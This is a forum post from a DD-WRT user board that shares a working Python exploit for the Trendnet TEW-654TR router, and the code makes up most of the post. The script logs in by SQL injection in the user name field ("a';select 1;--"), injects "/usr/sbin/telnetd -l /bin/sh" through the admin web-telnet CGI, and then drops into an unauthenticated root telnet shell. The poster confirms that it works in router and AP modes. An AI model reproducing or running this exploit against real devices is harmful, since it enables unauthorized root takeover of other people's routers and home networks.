dorfd1 DD-WRT User
Joined: 23 Apr 2009 Posts: 68
Posted: Sun May 27, 2012 1:20 Post subject: Trendnet tew-654tr telnet exploit |
http://pastebin.com/TDKAsJzA
Code: | #!/usr/bin/env python
# Pop a root shell on the TEW-654TR via SQL injection & command injection.
# Currently only works from the LAN side.
import re
import httplib
import urllib
import socket
import os
class Logging:
    """Minimal stdout logger: one fixed marker per severity level."""

    # Severity levels double as indices into `prefixes`.
    WARN = 0
    INFO = 1
    DEBUG = 2
    # Marker printed in front of every message, indexed by level.
    prefixes = [" [!] ", " [+] ", " [@] "]

    @classmethod
    def log_msg(cls, msg, level=INFO):
        """Print `msg` prefixed with the marker for `level` (default INFO)."""
        marker = Logging.prefixes[level]
        print(marker + msg)
def test_telnet():
    """Return True if a TCP connection to 192.168.10.1:23 can be opened.

    Used as a liveness probe for the telnet service after the previous
    step. Any exception raised by connect() (refused, unreachable, timed
    out) is treated as "not running" and yields False.
    """
    s = socket.socket()
    try:
        # Hard-coded LAN address of the device. No settimeout() is applied,
        # so a silently dropped connection attempt waits for the OS default.
        s.connect(("192.168.10.1", 23))
    except Exception as e:
        return False
    # NOTE(review): the socket is never closed on either return path.
    return True
def check_authentication(data):
    """Classify the login response body by its <redirect_page> marker.

    Returns True when a line redirects to "default" (login accepted),
    False when a line redirects to "back" (login rejected), and None when
    neither marker appears anywhere in `data`. The first matching line
    decides; the rejection check is evaluated first on each line.
    """
    rejected = re.compile('.*<redirect_page>back</redirect_page>.*')
    accepted = re.compile('.*<redirect_page>default</redirect_page>')
    for line in data.splitlines():
        if rejected.match(line):
            # Echo the rejecting line at DEBUG level before giving up.
            Logging.log_msg(line, Logging.DEBUG)
            return False
        if accepted.match(line):
            return True
    return None
# Stage 1 payload: sent verbatim as the login user name.
SQL_INJECTION = "a';select 1;--"
# Stage 2 payload: sent as the `cmd` parameter of the admin_webtelnet request.
TELNET_INJECTION = "/usr/sbin/telnetd -l /bin/sh"
username = SQL_INJECTION
password = ""
# The POST body is assembled by hand as a string so the parameter order is
# fixed (a dict would not guarantee it).
params = "request=login"
params += "&user_name=" + username
# NOTE(review): there is no '=' between user_pwd and its value; the body is
# only well-formed because `password` is the empty string.
params += "&user_pwd" + urllib.quote(password)
# Browser-like headers; the Referer is rewritten before the second request.
headers = {"Host": "192.168.10.1",
           "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:8.0.1) Gecko/20100101 Firefox/8.0.1",
           "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
           "Accept-Language": "en-us,en;q=0.5",
           "Content-Type": "application/x-www-form-urlencoded",
           "Referer": "http://192.168.10.1/login.htm"}
Logging.log_msg("Attempting to authenticate using SQL injection.")
Logging.log_msg("Sending POST.")
# All requests go to the device's hard-coded LAN address over plain HTTP.
conn = httplib.HTTPConnection("192.168.10.1")
# The query string after '?' looks like a cache-buster; the CGI is the target.
conn.request("POST", "/my_cgi.cgi?0.5219313003118983", params, headers)
response = conn.getresponse()
data = response.read()
Logging.log_msg("Got response: %s %s" % (str(response.status), response.reason))
conn.close()
# check_authentication() returns True / False / None (no marker found);
# anything other than True aborts the script.
success = check_authentication(data)
if True == success:
    Logging.log_msg("Authentication successful.")
elif False == success:
    Logging.log_msg("Authentication failed. Exiting.", Logging.WARN)
    # NOTE(review): uses the site-module `exit` builtin rather than sys.exit.
    exit(1)
else:
    Logging.log_msg("Unrecognized result.", Logging.WARN)
    exit(1)
Logging.log_msg("Attempting to start telnetd via command injection.")
params = "request=admin_webtelnet"
params += "&cmd=" + urllib.quote(TELNET_INJECTION)
conn = httplib.HTTPConnection("192.168.10.1")
headers["Referer"] = "http://192.168.10.1/st_device.htm"
conn.request("POST", "/my_cgi.cgi?0.19909728029442098", params, headers)
response = conn.getresponse()
Logging.log_msg("Got response: %s %s" % (str(response.status), response.reason))
# The second response body is read to drain the connection but never inspected;
# success is judged solely by test_telnet() below.
data = response.read()
conn.close()
if test_telnet():
    Logging.log_msg("Telnet started.")
else:
    Logging.log_msg("Telnet not started successfully.", Logging.WARN)
    exit(1)
Logging.log_msg("Starting interactive telnet session.")
# Hands the terminal to the system telnet client via the shell.
os.system("telnet 192.168.10.1")
Found this via Google, and it actually does give you access to a root telnet shell on your device.
I've only gotten this exploit to work in router mode.
Update:
This script works in both AP and router modes.
It fails to work in client mode.
Python is required.